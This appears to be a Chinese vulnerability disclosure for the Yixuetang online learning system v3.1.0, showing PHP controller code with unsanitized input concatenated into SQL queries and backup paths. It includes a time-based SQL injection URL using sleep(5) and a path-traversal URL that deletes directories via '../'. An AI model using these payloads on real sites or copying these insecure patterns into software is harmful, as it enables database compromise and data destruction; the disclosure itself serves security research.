易学堂在线学习系统 v3.1.0多处注入

public function order(){
        $state=I("get.state");
        $user_id=sp_get_current_userid();
        $where=empty($state)?array("user_id = $user_id"):array("user_id = $user_id and state=$state");//对传入的$state没有进行过滤
        $count=$this->order_obj->where($where)->count();
        $page = $this->page($count, 10);
        $data=$this->order_obj->limit($page->firstRow . ‘,‘ . $page->listRows)->where($where)->select();
        $num=$this->order_obj->where(array(‘state‘=>2,‘user_id‘=>$user_id))->count();
        $this->assign(‘num‘,$num);
        $this->assign(‘order‘,$data);
        $this->assign(‘state‘,$state);
         this->assign("Page", $page->show(‘Admin‘));
        $this->display(‘:order‘);
    }

http://127.0.0.1//index.php?g=user&m=center&a=order&state=1)%20and%20sleep(5)--+

    function add_post(){
    if (IS_POST) {
            $data = $this->course_obj->create();
            $count=$this->course_obj->count();
            $term_id=$_POST[‘ty_id‘];
            $typedata=$this->coursetype_obj->where("term_id=$term_id")->find();
            $teacherdata=M(‘application‘)->where(array(‘user_id‘=>sp_get_current_userid()))->find();
            $data[‘cs_teacher‘]=sp_get_current_userid();
            $data[‘top_id‘]=$typedata[‘parent‘];
            $data[‘cs_picture‘]=$_POST[‘cs_picture‘];
            $data[‘labelid‘]=$_POST[‘labelid‘];
            $deta[‘notice‘]=$_POST[‘code‘];
            $deta[‘count‘]=$_POST[‘count‘];
            $data[‘cs_addtime‘]=date(‘Y-m-d H:i:s‘);
            $data[‘cs_state‘]=1;
            $data[‘cs_brief‘]=htmlspecialchars_decode($data[‘cs_brief‘]);
            $data[‘course_type‘]=$_POST[‘type‘];
            $data[‘stu_numbers‘]=$_POST[‘stu_numbers‘];
            if($teacherdata[‘state‘]<1){
                $this->error("您还未通过审核，暂时不能添加课程！");
            }
            
            if($deta[‘notice‘]==‘sucess‘){
                if ($this->course_obj->add($data)) {
                    $this->success("添加成功！",U("Teacher/Center/index"));
                }else{
                    $this->error("添加失败！");
                }            
            }else{
                if($count>=$deta[‘count‘]){
                    $this->error($deta[‘notice‘]);
                }else{
                    if ($this->course_obj->add($data)) {
                        $this->success("添加成功！",U("Teacher/Center/index"));
                    }else{
                       $this->error("添加失败！");
                    }            
                }
            }
        }
    
    }

    function edit(){
        $id=I("get.id");
        //die("ad_id=$id");
        $ad=$this->ad_model->where("ad_id=$id")->find();
        $this->assign($ad);
        $this->display();
    }

    function toggle(){
        if(isset($_POST[‘ids‘]) && $_GET["display"]){
            $ids = implode(",", $_POST[‘ids‘]);
            $data[‘status‘]=1;
            if ($this->ad_model->where("ad_id in ($ids)")->save($data)!==false) {
                $this->success("显示成功！");
            } else {
                $this->error("显示失败！");
            }
        }
        if(isset($_POST[‘ids‘]) && $_GET["hide"]){
            $ids = implode(",", $_POST[‘ids‘]);
            $data[‘status‘]=0;
            if ($this->ad_model->where("ad_id in ($ids)")->save($data)!==false) {
                $this->success("隐藏成功！");
            } else {
                $this->error("隐藏失败！");
            }
        }
    }

    /**
     * 删除备份
     */
    public function del_backup()
    {
        if ((!isset($_GET[‘backup‘]) || empty($_GET[‘backup‘])) && (!isset($_POST[‘backup‘]) ||
            empty($_POST[‘backup‘])))
        {
            $this->error(‘非法参数‘);
        } 
        import(‘@.ORG.Dir‘); 
        $dir=new \Dir();
        $dir->delDir(SITE_PATH . $this->backup_path . $_GET[‘backup‘].‘/‘);             
        $this->success(‘操作成功！‘);
    }

index.php?g=admin&m=backup&a=del_backup&backup=../test

   public function download()
    {
        $backup_name = isset($_GET[‘backup‘]) && trim($_GET[‘backup‘]) ? trim($_GET[‘backup‘]) :
            $this->error(‘请选择备份名称！‘);
        $file = isset($_GET[‘file‘]) && trim($_GET[‘file‘]) ? trim($_GET[‘file‘]) : $this->
            error(‘请选择备份文件！‘);
        $sql_file = SITE_PATH . $this->backup_path . $backup_name . ‘/‘ . $file;
        if (file_exists($sql_file))
        {
            header(‘Content-type: application/unknown‘);
            header(‘Content-Disposition: attachment; filename="‘ . $file . ‘"‘);
            header("Content-Length: " . filesize($sql_file) . "; ");
            readfile($sql_file);
        } else
        {
            $this->error(‘文件不存在！‘);
        }
    }

    public function import()
    {
        $backup_name = isset($_GET[‘backup‘]) && trim($_GET[‘backup‘]) ? trim($_GET[‘backup‘]) :
            $this->error(‘请选择备份名称‘);
        $vol = empty($_GET[‘vol‘]) ? 1 : intval($_GET[‘vol‘]);
        $this->backup_name = $backup_name;
        //获得所有分卷
        $backups = $this->_get_vols($this->backup_name);
        $backup = isset($backups[$vol]) && $backups[$vol] ? $backups[$vol] : $this->
            error(‘无此文件！‘);
        //开始导入卷
        if ($this->_import_vol($backup[‘file‘]))
        {
            if ($vol < count($backups))
            {
                $vol++;
                $link = U("Backup/import",array("vol"=>$vol,"backup"=>urlencode($this->backup_name)));
                $this->success(sprintf(‘导入成功！‘, $vol - 1), $link);
            } else
            {
                $this->success(‘导入成功！‘, U("Backup/restore"));
            }
        }
    }